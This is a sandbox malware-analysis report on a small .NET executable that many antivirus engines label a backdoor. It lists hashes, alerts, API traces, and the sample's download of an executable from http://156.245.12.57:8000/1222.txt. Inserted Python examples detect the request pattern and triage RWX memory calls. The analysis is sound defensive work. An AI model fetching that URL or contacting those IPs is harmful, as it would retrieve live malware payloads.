Summary | ZeroBOX

xxx.exe

PE64 PE File
Category FILE
Machine s1_win7_x6401
Started Oct. 17, 2024, 10:33 a.m.
Completed Oct. 17, 2024, 10:42 a.m.
Size 5.5KB
Type PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
MD5 28b7505a051cf6a0e6ee179ef76be154
SHA256 1895cb39da800c897240669ce9a3e39cdf129b89c05f642c98ed324dad32fdb5
CRC32 DA7A042C
ssdeep 96:HnGS2T9v7+4fzeTJUA57EF4gVp9VkKvKPSvIazNt:ARyqCem7eVp9VkKvMSvIc
PDB Path C:\Users\jack\source\repos\ConsoleApp50\ConsoleApp50\obj\Release\ConsoleApp50.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)

DNS: Name Response Post-Analysis Lookup
No hosts contacted. (No DNS names appear in the capture; the connections listed below went to IP addresses directly.)
IP Address Status Action
136.243.104.235 Active Moloch
156.245.12.57 Active Moloch

Suricata Alerts

Flow SID Signature Category Alerts
TCP 156.245.12.57:8000 -> 192.168.56.101:49163 2022640 ET MALWARE PE EXE or DLL Windows file download Text M2 A Network Trojan was detected 1
TCP 156.245.12.57:8000 -> 192.168.56.101:49163 2012252 ET SHELLCODE Common 0a0a0a0a Heap Spray String Executable code was detected 47

Both rules fired on the same server-to-client flow, that is on the response body of the GET for 1222.txt: SID 2022640 on a Windows executable (PE) delivered as a text download, and SID 2012252, 47 times, on the byte run 0a 0a 0a 0a. That run is also ordinary newline padding, so the repeated second alert adds volume rather than evidence; the PE served under a .txt name is the finding.

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated
(The Status column is rendered as an icon in the original report and is absent from this export; rows below give the remaining columns by name.)

IsDebuggerPresent
(no arguments) return: 0 repeated: 0

IsDebuggerPresent
(no arguments) return: 0 repeated: 0

pdb_path C:\Users\jack\source\repos\ConsoleApp50\ConsoleApp50\obj\Release\ConsoleApp50.pdb

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx
(no arguments) status: 1 return: 1 repeated: 0

suspicious_features: GET method with no useragent header; Connection to IP address
suspicious_request: GET http://156.245.12.57:8000/1222.txt
request: GET http://156.245.12.57:8000/1222.txt
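The request indicators above (a GET with no User-Agent header, sent to a bare IP address) and the two Suricata alerts on the same flow can be reproduced as a small check over a raw HTTP exchange. The block below is an added example, not part of the ZeroBOX report or of the sample. The request/response pair in it is constructed to mirror the report's indicators rather than taken from the capture, and the "PE image served as text" label with its Content-Type test is this example's own reading of the SID 2022640 rule title, not the rule's actual detection logic.

```python
"""Check a raw HTTP exchange for the request features this report flags.
Added example; SAMPLE_REQUEST / SAMPLE_RESPONSE / BENIGN_REQUEST are constructed."""
import ipaddress
from urllib.parse import urlsplit

# Constructed to match the report: GET to a bare IP on port 8000, no User-Agent,
# and a response whose body starts with the PE magic although the path says .txt.
SAMPLE_REQUEST = (
    b"GET /1222.txt HTTP/1.1\r\n"
    b"Host: 156.245.12.57:8000\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n"
)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/plain\r\n"
    b"Content-Length: 64\r\n"
    b"\r\n"
    + b"MZ\x90\x00" + b"\x0a" * 60      # PE magic, then a run of 0x0a padding
)
BENIGN_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"\r\n"
)

HEAP_SPRAY_STRING = b"\x0a\x0a\x0a\x0a"   # the byte run named in the SID 2012252 title


def parse_http(raw: bytes):
    """Split a raw HTTP message into (start line, lowercased header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def is_ip_literal(host_header: str) -> bool:
    """True when Host names an IP address (v4, or bracketed v6), with or without a port."""
    try:
        hostname = urlsplit("//" + host_header).hostname
        if not hostname:
            return False
        ipaddress.ip_address(hostname)
    except ValueError:
        return False
    return True


def request_line(raw_request: bytes) -> str:
    """Rebuild the 'METHOD http://host:port/path' form the report uses for its request field."""
    start, headers, _ = parse_http(raw_request)
    method, path = start.split(" ")[:2]
    return f"{method} http://{headers.get('host', '')}{path}"


def request_features(raw_request: bytes, raw_response: bytes = b"") -> list:
    """Return the report's suspicious_features strings that apply to this exchange."""
    start, headers, _ = parse_http(raw_request)
    features = []
    if start.split(" ")[0] == "GET" and "user-agent" not in headers:
        features.append("GET method with no useragent header")
    if is_ip_literal(headers.get("host", "")):
        features.append("Connection to IP address")
    if raw_response:
        _, resp_headers, body = parse_http(raw_response)
        # Example's own check, modelled on the SID 2022640 title: a PE body under a text type.
        if body.startswith(b"MZ") and resp_headers.get("content-type", "").startswith("text/"):
            features.append("PE image served as text")
    return features


def has_heap_spray_string(raw_response: bytes) -> bool:
    """Body contains 0a0a0a0a; blank lines in ordinary text contain it too, hence the noise."""
    return HEAP_SPRAY_STRING in parse_http(raw_response)[2]
```

The User-Agent and bare-IP tests are exactly the two features the report lists; the PE-as-text test is the extra check an analyst would add so that a hit on the .txt download is explained by the body rather than by the rule name alone.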
Time & API Arguments Status Return Repeated

Memory calls, all in process_identifier 2552 through process_handle 0xffffffffffffffff (the current-process pseudo-handle). Every call requests protection 64 (PAGE_EXECUTE_READWRITE) and every call has stack_dep_bypass 0, stack_pivoted 0, status 1, return 0, repeated 0. heap_dep_bypass is 1 on each MEM_COMMIT and 0 on reserves and re-protects. Size is region_size for NtAllocateVirtualMemory and length for NtProtectVirtualMemory. Rows are in call order; Calls counts consecutive identical entries.

API Size Base address Allocation type heap_dep_bypass Calls
NtAllocateVirtualMemory 655360 0x0000000000840000 8192 (MEM_RESERVE) 0 1
NtAllocateVirtualMemory 8192 0x0000000000860000 4096 (MEM_COMMIT) 1 1
NtProtectVirtualMemory 4096 0x000007fef3a31000 - 0 1
NtProtectVirtualMemory 4096 0x000007fef40cb000 - 0 1
NtAllocateVirtualMemory 2555904 0x0000000002400000 8192 (MEM_RESERVE) 0 1
NtAllocateVirtualMemory 8192 0x00000000025f0000 4096 (MEM_COMMIT) 1 1
NtProtectVirtualMemory 4096 0x000007fef3a32000 - 0 11
NtProtectVirtualMemory 4096 0x000007fef3a34000 - 0 4
NtAllocateVirtualMemory 655360 0x000007fffff10000 1056768 (MEM_RESERVE|MEM_TOP_DOWN) 0 1
NtAllocateVirtualMemory 4096 0x000007fffff10000 4096 (MEM_COMMIT) 1 2
NtAllocateVirtualMemory 4096 0x000007fffff20000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 65536 0x000007fffff00000 1056768 (MEM_RESERVE|MEM_TOP_DOWN) 0 1
NtAllocateVirtualMemory 4096 0x000007fffff00000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe9427a000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe9432c000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe94356000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe94330000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe9428c000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe943a0000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe9428a000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe9427b000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe9429b000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe942cc000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe9429d000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe94272000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe943e0000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe942cd000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe943e1000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe9428b000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe943f0000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe943f1000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe943f2000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe943f3000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe943f4000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe943f5000 4096 (MEM_COMMIT) 1 1
NtAllocateVirtualMemory 4096 0x000007fe943f6000 4096 (MEM_COMMIT) 1 1
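The allocation trace above prints each flag argument as a raw integer with a decoded name beside it. The following added example (not tooling from the report) parses that key: value layout, decodes protection and allocation_type from the Windows constants, and groups writable-and-executable reserve, commit and re-protect calls by base address, which is how an analyst reads a trace like this one. SAMPLE_TRACE is a trimmed excerpt assembled from entries on this page: the process_identifier, process_handle, heap_dep_bypass and stack_* fields are left out for brevity (the parser accepts any key: value line), and the trailing "1 0 0" is read as status, return, repeated, following the table header.

```python
"""Parse a ZeroBOX/Cuckoo-style API trace and pull out writable+executable memory operations.
Added example; SAMPLE_TRACE is a trimmed excerpt assembled from the entries on this page."""
import re

SAMPLE_TRACE = """\
NtAllocateVirtualMemory
region_size: 655360
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000840000
allocation_type: 8192 (MEM_RESERVE)
1 0 0

NtAllocateVirtualMemory
region_size: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000860000
allocation_type: 4096 (MEM_COMMIT)
1 0 0

NtProtectVirtualMemory
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3a32000
1 0 0

NtProtectVirtualMemory
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3a32000
1 0 0

NtAllocateVirtualMemory
region_size: 655360
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
1 0 0
"""

# Windows memory-protection and allocation-type constants (winnt.h).
PAGE_FLAGS = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
              0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
              0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
              0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
ALLOC_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
               0x100000: "MEM_TOP_DOWN", 0x200000: "MEM_WRITE_WATCH",
               0x400000: "MEM_PHYSICAL", 0x20000000: "MEM_LARGE_PAGES"}
WX_MASK = 0x40 | 0x80   # protections that are both writable and executable


def decode_flags(value: int, table: dict) -> str:
    """Render a bitmask as 'A|B'; bits the table does not know are kept as hex, not dropped."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    unknown = value & ~sum(table)
    if unknown:
        names.append(hex(unknown))
    return "|".join(names) or "0"


def parse_trace(text: str) -> list:
    """One dict per call: a bare API name opens a record, 'key: value' lines are its arguments,
    and a line of integers is the report's 'status return repeated' trailer."""
    calls, current = [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        if re.fullmatch(r"[A-Za-z_]\w*", line):
            current = {"api": line, "args": {}}
            calls.append(current)
        elif current is None:
            continue
        elif re.fullmatch(r"-?\d+(?: -?\d+)*", line):
            vals = [int(v) for v in line.split()] + [None, None, None]
            current["status"], current["return"], current["repeated"] = vals[:3]
        else:
            key, _, value = line.partition(":")
            current["args"][key.strip()] = value.strip()
    return calls


def int_arg(call: dict, key: str):
    """Leading integer of a value such as '64 (PAGE_EXECUTE_READWRITE)' or '0x0000000000840000'."""
    raw = call["args"].get(key)
    return None if raw is None else int(raw.split()[0], 0)


def triage_wx(calls: list) -> dict:
    """Group successful W+X calls: reserves and commits as (base, size, flags), re-protects as a
    per-address count, which exposes repeated NtProtectVirtualMemory on one page."""
    out = {"reserve": [], "commit": [], "protect": {}}
    for call in calls:
        prot = int_arg(call, "protection")
        if prot is None or not prot & WX_MASK or call.get("status") != 1:
            continue
        base = call["args"]["base_address"]
        if call["api"] == "NtAllocateVirtualMemory":
            alloc = int_arg(call, "allocation_type")
            kind = "commit" if alloc & 0x1000 else "reserve"
            out[kind].append((base, int_arg(call, "region_size"), decode_flags(alloc, ALLOC_FLAGS)))
        elif call["api"] == "NtProtectVirtualMemory":
            out["protect"][base] = out["protect"].get(base, 0) + 1
    return out
```

Reading the trace this way separates the two things that matter: RWX commits (where downloaded bytes can be written and then run) and RWX re-protection of existing pages, and it makes a value such as 1056768 legible as MEM_RESERVE|MEM_TOP_DOWN without trusting the report's own decoding.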
Time & API Arguments Status Return Repeated

GetAdaptersAddresses
flags: 15 (GAA_FLAG_SKIP_UNICAST|GAA_FLAG_SKIP_ANYCAST|GAA_FLAG_SKIP_MULTICAST|GAA_FLAG_SKIP_DNS_SERVER)
family: 0 (AF_UNSPEC)
return: 111 (ERROR_BUFFER_OVERFLOW, the documented result when the caller's buffer is too small, i.e. the sizing half of the usual size-then-fill calling pattern) repeated: 0

host 136.243.104.235
host 156.245.12.57

Time & API Arguments Status Return Repeated

LdrGetProcedureAddress
ordinal: 0
function_address: 0x000007fefd6b7a50
function_name: wine_get_version
module: ntdll
module_address: 0x0000000076d30000
return: -1073741511 (0xC0000139, STATUS_ENTRYPOINT_NOT_FOUND: ntdll exports no wine_get_version, so the guest is not Wine) repeated: 0
Looking up wine_get_version is a standard Wine check, but the trace alone does not show whether the sample's own code or runtime library code loaded into the process issued it; confirm in the decompiled IL before counting it as evasion.
Antivirus Detections

Engine Result
Bkav W64.AIDetectMalware.CS
Lionic Trojan.Win32.Agent.Y!c
Cynet Malicious (score: 100)
Skyhigh Artemis!Trojan
Sangfor Backdoor.Win32.Agent.Vuls
CrowdStrike win/malicious_confidence_90% (D)
BitDefender Trojan.GenericKD.74327216
Elastic malicious (high confidence)
ESET-NOD32 a variant of Generik.THYAWK
APEX Malicious
Avast Win64:MalwareX-gen [Trj]
Kaspersky HEUR:Backdoor.MSIL.Agent.gen
MicroWorld-eScan Trojan.GenericKD.74327216
Emsisoft Trojan.GenericKD.74327216 (B)
McAfeeD ti!1895CB39DA80
CTX exe.trojan.artemis
SentinelOne Static AI - Malicious PE
FireEye Generic.mg.28b7505a051cf6a0
Google Detected
Kingsoft MSIL.Backdoor.Agent.gen
Microsoft Program:Win32/Wacapew.C!ml
ZoneAlarm HEUR:Backdoor.MSIL.Agent.gen
GData Trojan.GenericKD.74327216
Varist W64/Rozena.CM.gen!Eldorado
McAfee Artemis!28B7505A051C
DeepInstinct MALICIOUS
Malwarebytes Generic.Malware/Suspicious
Ikarus Win32.Outbreak
huorong Backdoor/Meterpreter.ak
MaxSecure Trojan.Malware.300983.susgen
Fortinet PossibleThreat
AVG Win64:MalwareX-gen [Trj]
Paloalto generic.ml